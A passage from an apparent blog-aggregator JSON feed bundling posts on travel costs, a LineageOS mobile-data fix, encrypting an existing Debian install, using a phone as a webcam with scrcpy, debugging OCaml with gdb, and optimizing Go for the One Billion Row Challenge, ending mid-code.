Airport.\nExpenses\nCategory\nAmount (INR)\n\n\n\n\nFood + Accommodation + Travel in Malaysia\n10,000\n\n\nDelhi to Kuala Lumpur flight\n13,000\n\n\nKuala Lumpur to Bangkok flight\n10,000\n\n\nBangkok to Delhi flight\n12,000\n\n\n\nLearning for future trips\nMalaysia has numerous places worthy of a visit: the Cameron Highlands (for its beautiful tea gardens), Malacca (due to its unique history and culture), Langkawi (for its white sand beaches) – and this list does not include the scenic spots from the part of Malaysia on the island of Borneo. However, I limited my trip to Kuala Lumpur and nearby places, which was a bad idea. After the trip, I realized that my mobility was reduced because I was carrying a trolley bag. Additionally, my trip to the Genting Highlands could have been replaced by a better alternative.\nIf you are like me and avoid taking a lot of taxis, preferring to walk or use public transport whenever possible, I highly advise you to cut back on luggage. Another instance where I could have benefited from this was with the airline ticket from Kuala Lumpur to Bangkok, which would have been much cheaper if I had carried less luggage (the tickets were 3,000-4,000 INR), compared to the ticket I bought for 10,000 INR.",[],{"slug":1043,"title":1044,"link":1045,"pubDate":1046,"contentSnippet":1047,"tags":1048,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fix-internet-on-lineage-os","Fixing Mobile Data issue on Lineage OS","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffix-internet-on-lineage-os\u002F","Fri, 01 Mar 2024 14:34:08 +0530","I have used LineageOS in many Android devices and face internet connectivity issues with mobile data. My mobile data never used to work properly in Xiaomi MI A2 on Lineage OS and my current phone OnePlus 9 Pro 5G. A few days ago, I met contrapunctus who has the same phone model with Lineage OS. He fixed this issue by comparing the settings of my phone with his.\nIn case, you are suffering from this issue, the following steps fixed the issue for me:\nNavigate to Settings -> Network Settings -> Your SIM settings -> Access Point Names.\nClick on the ‘+’ symbol to add a new access point.\nIn the Name section, you can input any name (e.g., test).\nIn the APN section, enter www and save the settings.\nCheck the screenshot below.\n\nAPN settings screenshot. Notice the circled entries.\n\n\nOnce you have added this new APN, ensure to select it from the list of available APNs. Following this configuration change, the issue got fixed. I hope this works for you :)",[],{"slug":1050,"title":1051,"link":1052,"pubDate":1053,"contentSnippet":1054,"tags":1055,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"07-encrypt-ext4-debian-install-html","How to encrypt an existing Debian install (LegacyBIOS)","https:\u002F\u002Faryak.me\u002Fblog\u002F07-encrypt-ext4-debian-install.html","Thu, 29 Feb 2024 12:39:45 +0000","Recently, I decided to encrypt the VPSes of Project Segfault, as it coincided with the\nmigration of one of our servers, our EU node.\nHowever, while moving our US node, we faced a few problems, in the\nfact that I didn’t want to wipe the disk, nor did I want to do some jank\nstuff like reinstalling debian and then replacing the files.\nTherefore, my only solution came down to creating a new encrypted\npartition, copying the entire directory tree of the old partition to the\nnew one via rsync, and then making grub and co. point to the new\nstuff.\nSo, in order to do this, you first need to shrink your existing\npartition so you can create the new one, which I did using GParted on\nthe GParted LiveCD.\nPast that, you have to create the new primary partition in the empty\nspace created, which I did via CFDisk, since GParted requires you to\nformat while creating a partition (from what I could see), and it\ndoesn’t support creating LUKS partitions.\nAdditionally, since you can’t use the “good” PBKDF, argon2i(d) (which\nis more secure and gives faster speeds) with the current version of grub\navailable on Debian 12, you have to move boot to a separate unencrypted\npartition. This can be done by merely creating a new ~512 MiB ext2\nprimary partition via GParted\nPast this, I had to create the LUKS stuff. To do so, I ran the\nfollowing commands:\n# Format partition as LUKS encrypted\ncryptsetup luksFormat --type luks2 --pbkdf argon2i \u002Fdev\u002FDEVICE\n# Open partition, and map it to \u002Fdev\u002Fmapper\u002Fcrypt\ncryptsetup luksOpen \u002Fdev\u002FDEVICE crypt\n# Overwrite the entire device with 0s, just to be a bit more secure\ndd if=\u002Fdev\u002Fzero of=\u002Fdev\u002Fmapper\u002Fcrypt status=progress bs=4096\n# Create ext4 partition on the mapped device\nmkfs.ext4 \u002Fdev\u002Fmapper\u002Fcrypt\n\nThen, to copy the content to the new partition, I used the following\ncommands:\nmkdir -p \u002Fmnt\u002F{old,new}\nmount \u002Fdev\u002FOLD_DEVICE \u002Fmnt\u002Fold\nmount \u002Fdev\u002Fmapper\u002Fcrypt \u002Fmnt\u002Fnew\nmkdir -p \u002Fmnt\u002Fnew\u002Fboot\nmount \u002Fdev\u002FBOOT_DEVICE \u002Fmnt\u002Fnew\u002Fboot\nrsync -av \u002Fmnt\u002Fold\u002F* \u002Fmnt\u002Fnew\n\nAfter all the data is copied, I need to enter a chroot environment in\norder to configure a few more things. This is done through the following\ncommands:\nmount -t sysfs \u002Fsys \u002Fmnt\u002Fnew\u002Fsys\u002F\nmount -t proc \u002Fproc \u002Fmnt\u002Fnew\u002Fproc\u002F\nmount --rbind \u002Fdev \u002Fmnt\u002Fnew\u002Fdev\u002F\nchroot \u002Fmnt\u002Fnew\n\nInside the chroot environment, you need to first install some\ncryptsetup related stuff, and then update the fstab file:\napt install cryptsetup cryptsetup-initramfs\n\n\u002Fetc\u002Fcrypttab (the file which tells the system what encrypted\npartitions to mount):\ncrypt   UUID=UUID_OF_PARTITION_FROM_BLKID   none    luks,discard\n\u002Fetc\u002Ffstab:\n\u002Fdev\u002Fmapper\u002Fcrypt   \u002F   ext4    rw  0   1\n\u002Fdev\u002FBOOT_PARTITION \u002Fboot   ext2    rw  0   1\nPast this, you need to reinstall grub:\ngrub-install \u002Fdev\u002FDISK # for legacy BIOS, note this is the disk not the partition (ie. \u002Fdev\u002Fvda not \u002Fdev\u002Fvda1)\nupdate-grub\n\nAnd that should be it, once you reboot, you should boot into a\npassword prompt, past which you can boot into your newly encrypted\nsystem!\nPS: don’t forget to remove the old partition :D",[1056],"2024\u002F02\u002F29\u002F4",{"slug":1058,"title":1059,"link":1060,"pubDate":1061,"contentSnippet":1062,"tags":1063,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"06-phone-webcam-scrcpy-html","Using my phone as a webcam with just scrcpy andADB","https:\u002F\u002Faryak.me\u002Fblog\u002F06-phone-webcam-scrcpy.html","Sat, 27 Jan 2024 12:39:45 +0000","Recently, we decided to start streaming FOSS United Mumbai events to our Peertube instance, and hence we needed a\ncamera.\nSince we couldn’t procure a good camera that can capture text from\nthe projector well, I started experimenting with other alternatives.\nThe first solution I tried was a generic IP camera based solution,\nwhich of course came with the latencies involved with network-based\nstuff and hence wasn’t suitable for this purpose.\nThen, I tried droidcam, which uses ADB, but again, it had a paywall\nfor anything over 480p.\nPast this, my jugaad solution was to use scrcpy via USB ADB,\nopen the normal camera app and then just capture part of the window with\nthe content, but that came with the issue of only being able to use 4:3\naspect ratio, and potentially worse quality since liveview is rarely as\ngood as actuals.\nLater, I discovered that scrcpy can natively capture the phone camera\nsince Android 12+ and Scrcpy 2.x+.\nThis came with the first problem, debian testing is\nstill stuck on 1.x of scrcpy!\nNote to self: maybe I should try porting a 2.x to Debian :D\nAs outlined in the docs,\nscrcpy can capture both front and back cameras, at all supported\nresolutions, and even the audio from the phone’s mic (which is useful\nconsidering how shitty the mics are on modern laptops these days) .\nSo at the end, I ended up with this command:\n\u002Fusr\u002Flocal\u002Fbin\u002Fscrcpy --video-source=camera --camera-id=0 --camera-size=3264x1836\n\nNow, at this point, I just needed to run OBS under Xwayland, add it\nas an Xcomposite video capture, and start streaming!\nBut then, if you want to use it as a webcam, you just have to install\nv4l2loopback (and run modprobe v4l2loopback), and then click “Start\nVirtual Camera” instead of Start Streaming.\nDo note though, you might have to change output type to scene under\nthe settings section right next to the start virtual camera button.\nBut thats about it. This is still a bit jank, considering you need\nscrcpy and OBS both running in the background, but it generally does the\njob pretty well, and a good phone’s webcam is miles better than any\nother mid-range web-cam you can get.",[1064],"2024\u002F01\u002F27\u002F6",{"slug":1066,"title":1067,"link":1068,"pubDate":1069,"contentSnippet":1070,"tags":1071,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"gdb-ocaml","Getting Started with GDB on OCaml","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fgdb\u002F2024\u002F01\u002F20\u002Fgdb-ocaml\u002F","2024-01-20T15:16:00.000Z","A number of folks who regularly use OCaml were surprised to learn that you can\nreasonably debug OCaml programs using gdb. The aim of the post is to show the\nfirst steps in using gdb on OCaml programs.\nLet’s consider the following program:\n\n(* fib.ml *)\nlet rec fib n = \n  if n = 0 then 0\n  else if n = 1 then 1\n  else fib (n-1) + fib (n-2)\n\nlet main () = \n  let r = fib 20 in \n  Printf.printf \"fib(20) = %d\" r\n\nlet _ = main ()\n\n\nLet’s compile this program. I’m using OCaml version 5.1.1.\n\n$ ocamlopt --version\n5.1.1\n$ ocamlopt -g -o fib.exe fib.ml\n$ $ .\u002Ffib.exe 20\nfib(20) = 6765\n\n\nAs you can see, the program prints the 20th Fibonacci number. Let’s examine this\nprogram under gdb. Before we venture any further, I highly recommend watching\nthis 15-minute video\nthat shows a number of gdb tricks. Let’s start a gdb session.\n\n$ gdb .\u002Ffib.exe\n\n\nSetting breakpoints\nLet’s set a break point at the fib function. When OCaml functions are\ncompiled, their names are mangled. OCaml 5.1.1 uses the following mangling\nscheme caml\u003CMODULE_NAME>.\u003CFUNCTION_NAME>_\u003CNNN> where NNN is a randomly\ngenerated number. For the fib function, since it is under the file fib.ml,\nthe module name is Fib. Since we can’t guess NNN, we use tab completion to\nhelp identify the function.\n\n(gdb) break camlFib.fib_ #press tab\n(gdb) break camlFib.fib_269 #269 happens to be the randomly generated number\n                            #on my machine.\n(gdb) Breakpoint 1 at 0x3d160: file fib.ml, line 1.\n\n\nYou can also set a breakpoint using gdb’s file name and line number combination.\nLet’s set another break point at the main function, which is at line number 6\nin fib.ml.\n\n(gdb) break fib.ml:6\nBreakpoint 2 at 0x3d1d0: file fib.ml, line 6.\n\n\nLet’s run the program.\n\n(gdb) r\nStarting program: \u002Fhome\u002Fkc\u002Ftemp\u002Ffib.exe \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\u002Flib\u002Fx86_64-linux-gnu\u002Flibthread_db.so.1\".\n\nBreakpoint 2, camlFib.main_271 () at fib.ml:6\n6       let main () =\n\n\nThe program execution starts in the gdb session and we stop at the breakpoint\ninstalled at main. gdb has a nice TUI mode for stepping through the file. This\ncan be activated with ctrl+x+a key combination, which should show a screen\nsimilar to the following.\n  \nNotice that we can see both the breakpoints installed in this file. The current\nline is highlighted.\nExamining the stack\nYou can step through the OCaml program with gdb commands n and s. After a\nfew ns, you can examine the backtrace using the bt command.\n\n(gdb) bt\n#0  camlFib.fib_269 () at fib.ml:1\n#1  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#2  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#3  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#4  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#5  0x00005555555911f1 in camlFib.main_271 () at fib.ml:7\n#6  0x000055555559129a in camlFib.entry () at fib.ml:10\n#7  0x000055555558eb0b in caml_program ()\n#8  \u003Csignal handler called>\n#9  0x00005555555dd306 in caml_startup_common (pooling=\u003Coptimised out>, argv=0x7fffffffe008) at runtime\u002Fstartup_nat.c:132\n#10 caml_startup_common (argv=0x7fffffffe008, pooling=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:88\n#11 0x00005555555dd37f in caml_startup_exn (argv=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:139\n#12 caml_startup (argv=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:144\n#13 caml_main (argv=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:151\n#14 0x000055555558e8f2 in main (argc=\u003Coptimised out>, argv=\u003Coptimised out>) at runtime\u002Fmain.c:37\n\n\nAs you can see the backtrace includes the recursive calls to the fib function,\nthe main function in fib.ml, followed by a number of functions from the\nOCaml runtime, and finally ending at the main function.\nNote that \u003Csignal handler called> is a misnomer and is not an actual signal\nhandler. OCaml 5 supports effect\nhandlers with the help of runtime\nmanaged stack segments for the OCaml stack. There is also a single C stack that\nis used by all the fibers that run on a\ndomain, our unit of parallelism.\nThe \u003Csignal handler called> represents a frame where the control switches\nbetween the C stack (managed by the OS) and the OCaml stack (managed by the\nOCaml runtime). The OCaml runtime marks these frames where the stack are split\nas signal handler frames so that gdb doesn’t complain about stack corruption;\ngdb expects stacks to grow down, which may not be true if the stack segments are\nin different parts of the memory address space. You will also find such \u003Csignal\nhandler called> frames between OCaml fibers (when using effect handlers) and\nwhen OCaml calls into the (C) runtime. You can find more details about the stack\nlayout in the PLDI 2021 paper on OCaml effect\nhandlers.\nExamining values\nThere isn’t good support for examining OCaml values in gdb unlike C. That said,\ngiven the uniform value representation of\nOCaml, with a bit of\ninformation about the OCaml calling convention, we can start to examine the\nvalues. It is useful to note that OCaml 5.1.1 on x86 passes the first 10\narguments in\nregisters.\nIn particular, the first argument is in the register rax. So the argument to\nthe fib function should be in the rax register. We also know that the\nargument to fib is an integer. OCaml uses 63-bit tagged integers (on 64-bit\nmachines) with the least-significant bit is 1. Given a machine word or a\nregister holding an OCaml integer, the integer value is obtained by right\nshifting the value by 1.\nPutting it all together, we can get the argument value of fib at the\nbreakpoint at the entry to fib as follows:\n\n(gdb) p $rax >> 1\n$2 = 12\n\n\nGiven that we’ve already stepped through the program several times, the current\ncall for me corresponds to fib(12). Let’s see what’s the next argument by\ncontinuing the program until we hit the breakpoint again.\n\n(gdb) c\nContinuing.\n\nBreakpoint 1, camlFib.fib_269 () at fib.ml:1\n(gdb) p $rax >> 1\n$3 = 10\n\n\nObserve that this corresponds to the recursive call fib(10), which must mean\nthat the RHS recursive call is the one being invoked. Note that the evaluation\norder of arguments in OCaml is unspecified. The 5.1.1 implementation does\nright-to-left evaluation of arguments (to the (+) function in this case),\nwhich can be confirmed with the following program:\n\n$ cat eval_order.ml\nlet _ =\n  (print_endline \"hello\"; 0) + (print_endline \"world\"; 1)\n$ ocamlopt.opt -g -o eval_order.exe eval_order.ml\n$ .\u002Feval_order.exe\nworld\nhello\n\n\nAdvanced printing\nAs you can observe, examining values this way is cumbersome. The OCaml compiler\ndistribution has some rudimentary scripts to make it easier to examine OCaml\nvalues in gdb. Note that this was developed by OCaml maintainers to develop the\ncompiler, and was not designed to serve end user needs. That said, let’s dive\nin.\nSince we are on OCaml 5.1.1, let’s check out the source code for 5.1.1\nfirst.\n\n# I'm in ~\u002Frepos directory on my machine *)\n$ git clone https:\u002F\u002Fgithub.com\u002Focaml\u002Focaml --branch 5.1.1\n\n\nLet’s start a new gdb session, load the gdb script and get to the desired\nbreakpoint.\n\n$ gdb .\u002Ffib.exe\n(gdb) source ~\u002Frepos\u002Focaml\u002Ftools\u002Fgdb_ocamlrun.py\n(gdb) break fib.ml:1\nBreakpoint 1 at 0x3d160: file fib.ml, line 1.\n(gdb) r\nStarting program: \u002Fhome\u002Fkc\u002Ftemp\u002Ffib.exe \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\u002Flib\u002Fx86_64-linux-gnu\u002Flibthread_db.so.1\".\n\nBreakpoint 1, camlFib.fib_269 () at fib.ml:1\n1       let rec fib n =\n\n\nAs earlier, the first argument is in rax register. We can examine the value\nnow with the help of the script.\n\n(gdb) p (value)$rax\n$1 = I(20)\n\n\nvalue is the type of OCaml values defined in OCaml runtime. The script\ntools\u002Fgdb_ocamlrun.py installs a pretty printer for the values of type\nvalue. Here, it prints that the argument is the integer 20.\nWe can also print other kinds of OCaml values. In order to illustrate this,\nconsider the following program:\n\n$ cat test_blocks.ml\n(* test_blocks.ml *)\n\ntype t = {s : string; i : int}\n\nlet main a b =\n  print_endline \"Hello, world!\";\n  print_endline a;\n  print_endline b.s\n\nlet _ = main \"foo\" {s = \"bar\"; i = 42}\n\n\nLet’s compile, start a gdb session and break at the main function.\n\n$ ocamlopt -g -o test_blocks.exe test_blocks.ml                                                                                                               \n$ gdb .\u002Ftest_blocks.exe\n(gdb) break camlTest_blocks.main_272 \nBreakpoint 1 at 0x16ed0: file test_blocks.ml, line 5.\n(gdb) r\nStarting program: \u002Fhome\u002Fkc\u002Ftemp\u002Ftest_blocks.exe \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\u002Flib\u002Fx86_64-linux-gnu\u002Flibthread_db.so.1\".\n\nBreakpoint 1, camlTest_blocks.main_272 () at test_blocks.ml:5\n5       let main a b =\n(gdb) source ~\u002Frepos\u002Focaml\u002Ftools\u002Fgdb_ocamlrun.py \n\n\nLet’s examine the two arguments to main.\n\n(gdb) p (value)$rax\n$1 = String_tag(\"foo\", NOT_MARKABLE)\n\n\nThe first argument is a string “foo”. NOT_MARKABLE is one of the GC colours\nused by OCaml 5, and represents objects that are not traced by the\nmark-and-sweep (major) GC. The string happens to be allocated in the data\nsection of the address space, and\nis not traced by the GC.\n\n(gdb) info symbol $rax\ncamlTest_blocks.4 in section .data of \u002Fhome\u002Fkc\u002Ftemp\u002Ftest_blocks.exe\n\n\nLet’s examine the second argument.\n\n(gdb) p (value)$rbx\n$2 = Block(0, wosize=2, NOT_MARKABLE)\n\n\nThe second argument, which is passed in the register rbx, is a record with two\nfields. Hence, the pretty printer says that it is a block with 2 fields.  We can\nprint both values using gdb’s support for printing a range of values.\n\n(gdb) p *(value*)$rbx@2                                                                 \n$3 = {String_tag(\"bar\", NOT_MARKABLE), I(42)}\n\n\nWe cast rbx to an array of values and print the first two fields in the\narray. This shows that the fields are the string “bar” and integer 42.\nMore for later\nThere is a lot more to be said about debugging OCaml programs using gdb. We\nshall see them in subsequent posts if there is interest.",[],{"slug":1073,"title":1074,"link":1075,"pubDate":1076,"contentSnippet":1077,"tags":1078,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"1brc","One Billion Row Challenge in Go","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002F1brc\u002F","2024-01-10T00:00:00.000Z","Earlier this week, I had stumbled upon 1brc, which presents a fun task: loading a huge text file (1 billion lines) in Java as quickly as possible.\nThe One Billion Row Challenge (1BRC) is a fun exploration of how far modern Java can be pushed for aggregating one billion rows from a text file. Utilize all your virtual threads, leverage SIMD, optimize your GC, or employ any other technique to create the fastest implementation for this task!\nThe challenge is mainly about Java, but I thought to do the same in my preferred language: Go. This post is about how I did several iterations to my Go program to reduce the time and discuss the main techniques used in each iteration to make it faster.\nI was able to create a solution which takes ~20s to read, parse and calculate stats for 1bn lines on my Apple M2 (10 vCPU, 32GB RAM).\nThere are some insane solutions that people have come up with, be sure to check out GitHub Discussions to go through them!\nPrerequisites#\nTo generate the text file for these measurements, follow the steps outlined here.\nAfter running the commands, I have a measurements.txt on my file system:\nExample output after running the commands:\n➜  1brc-go git:(main) du -sh measurements.txt\n 13G\tmeasurements.txt\n➜  1brc-go git:(main) tail measurements.txt\nMek'ele;13.3\nKampala;50.8\nDikson;-3.7\nDodoma;20.3\nSan Diego;7.1\nChihuahua;20.3\nNgaoundéré;24.2\nToronto;12.7\nWrocław;12.6\nSingapore;14.4\nUltra minimalistic example of reading a file#\nLet’s take a look at a basic Go code to read and parse the above file. We’ll also calculate stats on the fly.\npackage main\n\nimport (\n\t\"bufio\"\n\t\"fmt\"\n\t\"os\"\n\t\"sort\"\n\t\"strconv\"\n\t\"strings\"\n)\n\ntype Measurement struct {\n\tStation string\n\tTemp    float64\n}\n\ntype Stats struct {\n\tMin, Mean, Max float64\n}\n\nfunc main() {\n\t\u002F\u002F Open the file.\n\tfile, err := os.Open(\"measurements.txt\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer file.Close()\n\n\t\u002F\u002F Map to hold the temperatures for each station.\n\tstationTemps := make(map[string][]float64)\n\n\tscanner := bufio.NewScanner(file)\n\tfor scanner.Scan() {\n\t\t\u002F\u002F Parse each line into a Measurement struct.\n\t\tparts := strings.Split(scanner.Text(), \";\")\n\t\ttemp, _ := strconv.ParseFloat(parts[1], 64)\n\t\tstationTemps[parts[0]] = append(stationTemps[parts[0]], temp)\n\t}\n\n\t\u002F\u002F Calculate min, mean, and max for each station.\n\tresults := make(map[string]Stats)\n\tfor station, temps := range stationTemps {\n\t\tmin, max, sum := temps[0], temps[0], 0.0\n\t\tfor _, t := range temps {\n\t\t\tif t \u003C min {\n\t\t\t\tmin = t\n\t\t\t}\n\t\t\tif t > max {\n\t\t\t\tmax = t\n\t\t\t}\n\t\t\tsum += t\n\t\t}\n\t\tmean := sum \u002F float64(len(temps))\n\t\tresults[station] = Stats{Min: min, Mean: mean, Max: max}\n\t}\n\n\t\u002F\u002F Sort the stations and format the output.\n\tvar stations []string\n\tfor station := range results {\n\t\tstations = append(stations, station)\n\t}\n\tsort.Strings(stations)\n\n\tfmt.Print(\"{\")\n\tfor i, station := range stations {\n\t\tr := results[station]\n\t\tfmt.Printf(\"%s=%.1f\u002F%.1f\u002F%.1f\", station, r.Min, r.Mean, r.Max)\n\t\tif i \u003C len(stations)-1 {\n\t\t\tfmt.Print(\", \")\n\t\t}\n\t}\n\tfmt.Println(\"}\")\n}\nOn running the above program, we get the following output:\n{Chihuahua=20.3\u002F20.3\u002F20.3, Dikson=-3.7\u002F-3.7\u002F-3.7, Dodoma=20.3\u002F20.3\u002F20.3, Kampala=50.8\u002F50.8\u002F50.8, Mek'ele=13.3\u002F13.3\u002F13.3, Ngaoundéré=24.2\u002F24.2\u002F24.2, San Diego=7.1\u002F7.1\u002F7.1, Singapore=14.4\u002F14.4\u002F14.4, Toronto=12.7\u002F12.7\u002F12.7, Wrocław=12.6\u002F12.6\u002F12.6}\nThis approach works well for small, simple files. However, there are certain restrictions:\nIt reads the file line by line using a scanner. Reading and processing a billion rows is time-consuming.\nEach operation, even if small, adds up when repeated a billion times. This includes string splitting, type conversion, error checking, and appending to a slice.\nAdditionally, we need to consider the potential of hitting the max Disk IOPS limit if we perform too many file operations per second.\nBefore we proceed to optimize this further, let’s establish a baseline performance of 100 million lines first:\n$ wc -l measurements.txt\n  100000000 measurements.txt\n$ time go run main.go\n  go run main.go  18.44s user 0.83s system 100% cpu 19.135 total\nBaseline: It takes approximately 19s to read and calculate stats from 100 mn lines.\nThere’s a lot of room to optimize it further, let’s go through them one by one.\nIteration 1: Producer-Consumer Pattern#\nThe concept involves reading multiple lines simultaneously in the producer Goroutine and then dispatching these batches to worker Goroutines. We can establish a worker pool to implement a producer-consumer pattern. Producers read lines from the file and send them to a channel. Consumers retrieve lines from the channel, parse the data, and calculate the minimum, mean, and maximum temperatures for each station.\nfunc main() {\n\tnumWorkers := runtime.NumCPU()\n\truntime.GOMAXPROCS(numWorkers)\n\n\tlinesChan := make(chan string, 1000000)\n\tresultsChan := make(chan map[string]Stats, numWorkers)\n\n\t\u002F\u002F Start worker goroutines\n\tvar wg sync.WaitGroup\n\tfor i := 0; i \u003C numWorkers; i++ {\n\t\twg.Add(1)\n\t\tgo worker(linesChan, resultsChan, &wg)\n\t}\n\n\t\u002F\u002F Read the file and send lines to the workers\n\tgo func() {\n\t\tfile, err := os.Open(measurementsFile)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer file.Close()\n\n\t\tscanner := bufio.NewScanner(file)\n\t\tfor scanner.Scan() {\n\t\t\tlinesChan \u003C- scanner.Text()\n\t\t}\n\t\tclose(linesChan)\n\t}()\n\n\t\u002F\u002F Collect results from workers\n\twg.Wait()\n\tclose(resultsChan)\n\n\t\u002F\u002F Aggregate results\n\tfinalResults := make(map[string]Stats)\n\tfor workerResult := range resultsChan {\n\t\tfor station, stats := range workerResult {\n\t\t\tfinalStats := finalResults[station]\n\t\t\tfinalStats.Min = min(finalStats.Min, stats.Min)\n\t\t\tfinalStats.Max = max(finalStats.Max, stats.Max)\n\t\t\tfinalStats.Mean = (finalStats.Mean*float64(finalStats.Count) + stats.Mean*float64(stats.Count)) \u002F float64(finalStats.Count+stats.Count)\n\t\t\tfinalStats.Count += stats.Count\n\t\t\tfinalResults[station] = finalStats\n\t\t}\n\t}\n\n\t\u002F\u002F Print results\n\tprintStats(finalResults)\n}\n\nfunc worker(linesChan \u003C-chan string, resultsChan chan\u003C- map[string]Stats, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\n\tstationStats := make(map[string]Stats)\n\tfor line := range linesChan {\n\t\tparts := strings.Split(line, \";\")\n\t\ttemp, err := strconv.ParseFloat(parts[1], 64)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tstats := stationStats[parts[0]]\n\t\tstats.Count++\n\t\tstats.Min = min(stats.Min, temp)\n\t\tstats.Max = max(stats.Max, temp)\n\t\tstats.Mean += (temp - stats.Mean) \u002F float64(stats.Count)\n\t\tstationStats[parts[0]] = stats\n\t}\n\n\tresultsChan \u003C- stationStats\n}\n\nfunc min(a, b float64) float64 {\n\tif a == 0 || a > b {\n\t\treturn b\n\t}\n\treturn a\n}\n\nfunc max(a, b float64) float64 {\n\tif a \u003C b {\n\t\treturn b\n\t}\n\treturn a\n}\n\nfunc printStats(statsMap map[string]Stats) {\n\tvar stations []string\n\tfor station := range statsMap {\n\t\tstations = append(stations, station)\n\t}\n\tsort.Strings(stations)\n\n\tfmt.Print(\"{\")\n\tfor i, station := range stations {\n\t\tstats := statsMap[station]\n\t\tfmt.Printf(\"%s=%.1f\u002F%.1f\u002F%.1f\", station, stats.Min, stats.Mean, stats.Max)\n\t\tif i \u003C len(stations)-1 {\n\t\t\tfmt.Print(\", \")\n\t\t}\n\t}\n\tfmt.Println(\"}\")\n}\nResults#\nThe concurrent version, unexpectedly, resulted in almost a 3x decrease in performance.\ngo run main.go  84.15s user 101.34s system 342% cpu 54.225 total\nWhere did we go wrong? This is a classic case where the overhead of concurrency mechanisms outweighs their benefits. In our current implementation, each line is sent to the channel individually, which is likely less efficient than batching lines for processing. This means that for a file with a large number of lines, there will be an equally large number of channel send operations. Each channel operation involves locking and unlocking, which can be costly, especially in a high-frequency context.\nIteration 2: Batch processing of lines#\nIn this version we are Batching the lines before sending to the worker which will significantly reduce the overhead of channel communication.\nBatch Processing: Each batch contains batchSize lines. This reduces the frequency of channel operations (both sending and receiving), as well as the overhead associated with these operations.\nEfficient Worker Utilization: With batch processing, each worker goroutine spends more time processing data and less time interacting with channels. This reduces the overhead of context switching and synchronization, making the processing more efficient.\nconst (\n\tbatchSize        = 1000000 \u002F\u002F Number of lines per batch\n)\n\n\u002F\u002F ...\n\t\tscanner := bufio.NewScanner(file)\n\t\tvar batch []string\n\t\tfor scanner.Scan() {\n\t\t\tbatch = append(batch, scanner.Text())\n\t\t\tif len(batch) >= batchSize {\n\t\t\t\tbatchesChan \u003C- batch\n\t\t\t\tbatch = nil \u002F\u002F Start a new batch\n\t\t\t}\n\t\t}\n\t\t\u002F\u002F Send any remaining lines in the last batch\n\t\tif len(batch) > 0 {\n\t\t\tbatchesChan \u003C- batch\n\t\t}\n\t\tclose(batchesChan)\n\n\u002F\u002F ...\nfunc worker(batchesChan \u003C-chan []string, resultsChan chan\u003C- map[string]Stats, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\n\tstationStats := make(map[string]Stats)\n\tfor batch := range batchesChan {\n\t\tfor _, line := range batch {\n            \u002F\u002F Process the line ...\n        }\n\t}\n\n\tresultsChan \u003C- stationStats\n}\n\u002F\u002F ...\nResults#\nThe improvement from iteration 2 to iteration 3 is quite remarkable, thanks to efficiently batching the lines together and reducing the number of channel ops.\ngo run main.go  30.02s user 0.67s system 476% cpu 6.442 total\nSo far, we’ve reduced the time to about 6.5s which is a great start and improvement of our baseline version of 19s. However, we’re making quite a few extra memory allocations and the focus of next iteration should be to reduce that.\nIteration 3: Reducing memory allocations#\nA batch slice is pre-allocated with a capacity of batchSize and reused for each batch of lines.\nAfter sending a batch to the channel, the slice is reset to zero length (batch = batch[:0]), but the underlying array is retained and reused.\n\u002F\u002F Read the file and send batches of lines to the workers\n\tgo func() {\n\t\tfile, err := os.Open(measurementsFile)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer file.Close()\n\n\t\tscanner := bufio.NewScanner(file)\n\t\tbatch := make([]string, 0, batchSize) \u002F\u002F Pre-allocate with capacity\n\n\t\tfor scanner.Scan() {\n\t\t\tline := scanner.Text()\n\n\t\t\t\u002F\u002F Reuse the batch slice by appending to it until it reaches the batch size\n\t\t\tbatch = append(batch, line)\n\n\t\t\tif len(batch) >= batchSize {\n\t\t\t\tbatchesChan \u003C- batch\n\t\t\t\tbatch = batch[:0] \u002F\u002F Reset the slice without allocating new memory\n\t\t\t}\n\t\t}\n\t\t\u002F\u002F Send any remaining lines in the last batch\n\t\tif len(batch) > 0 {\n\t\t\tbatchesChan \u003C- batch\n\t\t}\n\t\tclose(batchesChan)\n\t}()\nResults#\nDown to 5.3s!\ngo run main.go  25.43s user 0.53s system 485% cpu 5.346 total\nIteration 3 (cont): Further reducing memory allocations#\nAvoiding strings.Split: Instead of using strings.Split, which allocates a new slice for each line, we can use  strings.Index to find the delimiter and manually slice the string. strings.Split typically creates a new slice for each split part, leading to more memory usage and subsequent GC overhead.\nfor batch := range batchesChan {\n\t\tfor _, line := range batch {\n\t\t\tdelimiterIndex := strings.Index(line, \";\")\n\t\t\tif delimiterIndex == -1 {\n\t\t\t\tcontinue \u002F\u002F Delimiter not found, skip this line\n\t\t\t}\n\n\t\t\tstation := line[:delimiterIndex]\n\n\t\t\ttempStr := line[delimiterIndex+1:]\n\t\t\ttemp, err := strconv.ParseFloat(tempStr, 64)\n\t\t\tif err != nil {\n\t\t\t\tcontinue \u002F\u002F Invalid temperature value, skip this line\n\t\t\t}\n\n\t\t\tstats := stationStats[station]\n\t\t\tstats.Count++\n\t\t\tstats.Min = min(stats.Min, temp)\n\t\t\tstats.Max = max(stats.Max, temp)\n\t\t\tstats.Mean += (temp - 